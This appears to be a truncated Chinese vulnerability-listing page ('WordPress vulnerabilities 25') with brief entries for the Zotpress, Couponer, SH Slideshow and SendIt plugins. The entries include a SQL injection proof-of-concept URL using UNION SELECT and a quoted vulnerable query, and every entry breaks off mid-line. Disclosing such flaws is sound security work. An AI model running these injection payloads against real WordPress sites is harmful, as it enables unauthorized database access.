wordpress漏洞25

WordPress的Zotpress插件
PoC --- http://www.xxx.com/wp-content/plugins/zotpress/zotpress.rss.php?api_user_id=1&account_ty...
WordPress的Couponer插件
http://www.xxxx.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version()...
WordPress插件SH Slideshow
下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip 影响版本: 3.1.4 (已测试) ---------------...
WordPress的SendIt插件
[ submit.php line 27 ] $user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where emai...